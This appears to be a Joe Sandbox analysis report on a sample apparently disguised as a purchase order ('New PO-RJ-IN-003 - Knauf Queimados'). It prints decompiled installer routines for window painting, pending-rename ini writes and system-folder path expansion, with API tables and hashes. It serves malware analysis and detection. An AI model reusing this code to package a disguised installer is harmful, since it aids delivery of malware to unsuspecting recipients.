                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                          • String ID: /B$N$open
                                                                                                                          • API String ID: 3615053054-636633259
                                                                                                                          • Opcode ID: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                                                                                                                          • Instruction ID: 4ef5deaae8a6f16a89100f2c462af89a3ec6633dbf44de90af8596516ef02dbc
                                                                                                                          • Opcode Fuzzy Hash: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                                                                                                                          • Instruction Fuzzy Hash: 85619FB1A40209BBEB109F60DD45F6A7B79FB44715F108036FB05BA2D1C7B8A951CF98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f90;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423f88;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                                          0x0040100a
                                                                                                                          0x00401039
                                                                                                                          0x00401047
                                                                                                                          0x0040104d
                                                                                                                          0x00401051
                                                                                                                          0x0040105b
                                                                                                                          0x00401061
                                                                                                                          0x00401064
                                                                                                                          0x004010f3
                                                                                                                          0x00401089
                                                                                                                          0x0040108c
                                                                                                                          0x004010a6
                                                                                                                          0x004010bd
                                                                                                                          0x004010cc
                                                                                                                          0x004010cf
                                                                                                                          0x004010d5
                                                                                                                          0x004010d9
                                                                                                                          0x004010e4
                                                                                                                          0x004010ed
                                                                                                                          0x004010ef
                                                                                                                          0x004010ef
                                                                                                                          0x00401100
                                                                                                                          0x00401105
                                                                                                                          0x0040110d
                                                                                                                          0x00401110
                                                                                                                          0x00401112
                                                                                                                          0x00401118
                                                                                                                          0x0040111f
                                                                                                                          0x00401126
                                                                                                                          0x00401130
                                                                                                                          0x00401142
                                                                                                                          0x00401156
                                                                                                                          0x00401160
                                                                                                                          0x00401165
                                                                                                                          0x00401165
                                                                                                                          0x00401110
                                                                                                                          0x0040116e
                                                                                                                          0x00000000
                                                                                                                          0x00401178
                                                                                                                          0x00401010
                                                                                                                          0x00401013
                                                                                                                          0x00401015
                                                                                                                          0x0040101f
                                                                                                                          0x0040101f
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32 ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32 ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextA.USER32(00000000,00423780,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F
                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                          • Opcode ID: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                                                                                                                          • Instruction ID: 5ee0eae5ae25bcf212c08558168c62b52fbe6696795006813c9da87f91bafb02
                                                                                                                          • Opcode Fuzzy Hash: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                                                                                                                          • Instruction Fuzzy Hash: 00419A71804249AFCB058F94DD459AFBBB9FF44315F00812AF961AA2A0C738AA50DFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405A49 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E00405A49(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00406087(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x424010 =  *0x424010 + 1;
						return _t20;
					}
				}
				 *0x422710 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422188, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d88, "%s=%s\r\n", 0x422710, 0x422188);
						_t56 = _t55 + 0x10;
						E00405D1D(_t43, 0x400, 0x422188, 0x422188,  *((intOrPtr*)( *0x423f90 + 0x128)));
						_t20 = E004059D2(0x422188, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405947(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405947(_t26 + 0xa, 0x409424);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405993(_t51 + _t29, 0x421d88, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405CFB(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004059D2(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422710, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                                                          0x00405a4f
                                                                                                                          0x00405a56
                                                                                                                          0x00405a5a
                                                                                                                          0x00405a63
                                                                                                                          0x00405a67
                                                                                                                          0x00405ba6
                                                                                                                          0x00405ba6
                                                                                                                          0x00000000
                                                                                                                          0x00405ba6
                                                                                                                          0x00405a67
                                                                                                                          0x00405a73
                                                                                                                          0x00405a89
                                                                                                                          0x00405ab1
                                                                                                                          0x00405abc
                                                                                                                          0x00405ac0
                                                                                                                          0x00405ae0
                                                                                                                          0x00405ae7
                                                                                                                          0x00405af1
                                                                                                                          0x00405afe
                                                                                                                          0x00405b03
                                                                                                                          0x00405b08
                                                                                                                          0x00405b0c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405b1b
                                                                                                                          0x00405b1d
                                                                                                                          0x00405b2a
                                                                                                                          0x00405b2e
                                                                                                                          0x00405b9f
                                                                                                                          0x00405ba0
                                                                                                                          0x00000000
                                                                                                                          0x00405b4a
                                                                                                                          0x00405b57
                                                                                                                          0x00405bbc
                                                                                                                          0x00405bc3
                                                                                                                          0x00405b6a
                                                                                                                          0x00405b6a
                                                                                                                          0x00405b6c
                                                                                                                          0x00405b75
                                                                                                                          0x00405b80
                                                                                                                          0x00405b92
                                                                                                                          0x00405b99
                                                                                                                          0x00000000
                                                                                                                          0x00405b99
                                                                                                                          0x00405bc5
                                                                                                                          0x00405bc6
                                                                                                                          0x00405bcb
                                                                                                                          0x00405bcd
                                                                                                                          0x00405bda
                                                                                                                          0x00405bda
                                                                                                                          0x00405bde
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405bcf
                                                                                                                          0x00405bcf
                                                                                                                          0x00405bd2
                                                                                                                          0x00405bd5
                                                                                                                          0x00405bd6
                                                                                                                          0x00000000
                                                                                                                          0x00405bcf
                                                                                                                          0x00405b62
                                                                                                                          0x00405b67
                                                                                                                          0x00000000
                                                                                                                          0x00405b67
                                                                                                                          0x00405b2e
                                                                                                                          0x00405a8b
                                                                                                                          0x00405a96
                                                                                                                          0x00405a9f
                                                                                                                          0x00405aa3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405aa3
                                                                                                                          0x00405bb0

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                                                                                            • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004057DE,?,00000000,000000F1,?), ref: 00405A96
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00405A9F
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00405ABC
                                                                                                                          • wsprintfA.USER32 ref: 00405ADA
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00422188,C0000000,00000004,00422188,?,?,?,00000000,000000F1,?), ref: 00405B15
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405B24
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405B3A
                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D88,00000000,-0000000A,00409424,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405B80
                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405B92
                                                                                                                          • GlobalFree.KERNEL32 ref: 00405B99
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405BA0
                                                                                                                            • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                                                                                                                            • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                                                          • String ID: %s=%s$[Rename]
                                                                                                                          • API String ID: 3445103937-1727408572
                                                                                                                          • Opcode ID: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                                                                                                                          • Instruction ID: d3b858f9c50fd1002edea1203351e8dfee5eb830211114c78627ca8ef1b38bc0
                                                                                                                          • Opcode Fuzzy Hash: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                                                                                                                          • Instruction Fuzzy Hash: 2B41FF71A45A15BBD7206B619D49F6B3AACEF80754F140436FE05F22C2E67CBC018EAD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405D1D Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 197stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E00405D1D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42375c - 4 + _t36 * 4);
				}
				_t74 =  *0x423fb8 + _t36;
				_t37 = 0x422f20;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422f20;
				if(_a4 - 0x422f20 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405D1D(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422f20;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405CFB(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405C59(_t86,  *0x423f88);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405F5D(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x424004;
						if( *0x424004 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f84;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423fb8;
							E00405BE2(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423fb8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405D1D(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405CFB(_a4, _t37);
			}




























                                                                                                                          0x00405d1d
                                                                                                                          0x00405d1d
                                                                                                                          0x00405d1d
                                                                                                                          0x00405d23
                                                                                                                          0x00405d28
                                                                                                                          0x00405d39
                                                                                                                          0x00405d39
                                                                                                                          0x00405d44
                                                                                                                          0x00405d46
                                                                                                                          0x00405d4b
                                                                                                                          0x00405d4e
                                                                                                                          0x00405d4f
                                                                                                                          0x00405d56
                                                                                                                          0x00405d58
                                                                                                                          0x00405d5e
                                                                                                                          0x00405d61
                                                                                                                          0x00405d61
                                                                                                                          0x00405f3a
                                                                                                                          0x00405f3a
                                                                                                                          0x00405f3e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405d6e
                                                                                                                          0x00405d74
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405d7a
                                                                                                                          0x00405d7b
                                                                                                                          0x00405d7e
                                                                                                                          0x00405d81
                                                                                                                          0x00405f2d
                                                                                                                          0x00405f37
                                                                                                                          0x00405f39
                                                                                                                          0x00405f39
                                                                                                                          0x00405f2f
                                                                                                                          0x00405f31
                                                                                                                          0x00405f33
                                                                                                                          0x00405f34
                                                                                                                          0x00405f34
                                                                                                                          0x00000000
                                                                                                                          0x00405f2d
                                                                                                                          0x00405d87
                                                                                                                          0x00405d8b
                                                                                                                          0x00405d9b
                                                                                                                          0x00405d9f
                                                                                                                          0x00405da6
                                                                                                                          0x00405da9
                                                                                                                          0x00405dad
                                                                                                                          0x00405db3
                                                                                                                          0x00405db6
                                                                                                                          0x00405db9
                                                                                                                          0x00405dbc
                                                                                                                          0x00405ed7
                                                                                                                          0x00405eda
                                                                                                                          0x00405f0a
                                                                                                                          0x00405f0d
                                                                                                                          0x00405f12
                                                                                                                          0x00405f16
                                                                                                                          0x00405f16
                                                                                                                          0x00405f1b
                                                                                                                          0x00405f1c
                                                                                                                          0x00405f21
                                                                                                                          0x00405f24
                                                                                                                          0x00405f26
                                                                                                                          0x00000000
                                                                                                                          0x00405f26
                                                                                                                          0x00405edc
                                                                                                                          0x00405edf
                                                                                                                          0x00405ef4
                                                                                                                          0x00405efb
                                                                                                                          0x00405ee1
                                                                                                                          0x00405ee8
                                                                                                                          0x00405ee8
                                                                                                                          0x00405f03
                                                                                                                          0x00405f06
                                                                                                                          0x00405ecf
                                                                                                                          0x00405ed0
                                                                                                                          0x00405ed0
                                                                                                                          0x00000000
                                                                                                                          0x00405f06
                                                                                                                          0x00405dc4
                                                                                                                          0x00405dc5
                                                                                                                          0x00405dcb
                                                                                                                          0x00405dcd
                                                                                                                          0x00405de7
                                                                                                                          0x00405de7
                                                                                                                          0x00405dee
                                                                                                                          0x00405dee
                                                                                                                          0x00405df5
                                                                                                                          0x00405df9
                                                                                                                          0x00405df9
                                                                                                                          0x00405dfa
                                                                                                                          0x00405dfc
                                                                                                                          0x00405e35
                                                                                                                          0x00405e38
                                                                                                                          0x00405e48
                                                                                                                          0x00405e4b
                                                                                                                          0x00405e53
                                                                                                                          0x00405e59
                                                                                                                          0x00405e59
                                                                                                                          0x00405eb5
                                                                                                                          0x00405eb5
                                                                                                                          0x00405eb7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e5d
                                                                                                                          0x00405e64
                                                                                                                          0x00405e65
                                                                                                                          0x00405e67
                                                                                                                          0x00405e81
                                                                                                                          0x00405e8f
                                                                                                                          0x00405e95
                                                                                                                          0x00405e97
                                                                                                                          0x00405eb2
                                                                                                                          0x00405eb2
                                                                                                                          0x00405eb2
                                                                                                                          0x00000000
                                                                                                                          0x00405eb2
                                                                                                                          0x00405e9d
                                                                                                                          0x00405ea8
                                                                                                                          0x00405eae
                                                                                                                          0x00405eb0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405eb0
                                                                                                                          0x00405e69
                                                                                                                          0x00405e6c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e7b
                                                                                                                          0x00405e7d
                                                                                                                          0x00405e7f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e7f
                                                                                                                          0x00000000
                                                                                                                          0x00405eb5
                                                                                                                          0x00405e40
                                                                                                                          0x00000000
                                                                                                                          0x00405dfe
                                                                                                                          0x00405e03
                                                                                                                          0x00405e19
                                                                                                                          0x00405e1e
                                                                                                                          0x00405e21
                                                                                                                          0x00405ebe
                                                                                                                          0x00405ebe
                                                                                                                          0x00405ec2
                                                                                                                          0x00405eca
                                                                                                                          0x00405eca
                                                                                                                          0x00000000
                                                                                                                          0x00405ec2
                                                                                                                          0x00405e2b
                                                                                                                          0x00405eb9
                                                                                                                          0x00405eb9
                                                                                                                          0x00405ebc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405ebc
                                                                                                                          0x00405dfc
                                                                                                                          0x00405dcf
                                                                                                                          0x00405dd3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405dd5
                                                                                                                          0x00405dd9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405ddb
                                                                                                                          0x00405ddf
                                                                                                                          0x00000000
                                                                                                                          0x00405de1
                                                                                                                          0x00405de1
                                                                                                                          0x00000000
                                                                                                                          0x00405de1
                                                                                                                          0x00405ddf
                                                                                                                          0x00405f44
                                                                                                                          0x00405f4e
                                                                                                                          0x00405f5a
                                                                                                                          0x00405f5a
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetVersion.KERNEL32(?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405DC5
                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 00405E40
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(00422F20,00000400), ref: 00405E53
                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8F
                                                                                                                          • SHGetPathFromIDListA.SHELL32(00000000,00422F20), ref: 00405E9D
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00405EA8
                                                                                                                          • lstrcatA.KERNEL32(00422F20,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ECA
                                                                                                                          • lstrlenA.KERNEL32(00422F20,?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405F1C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
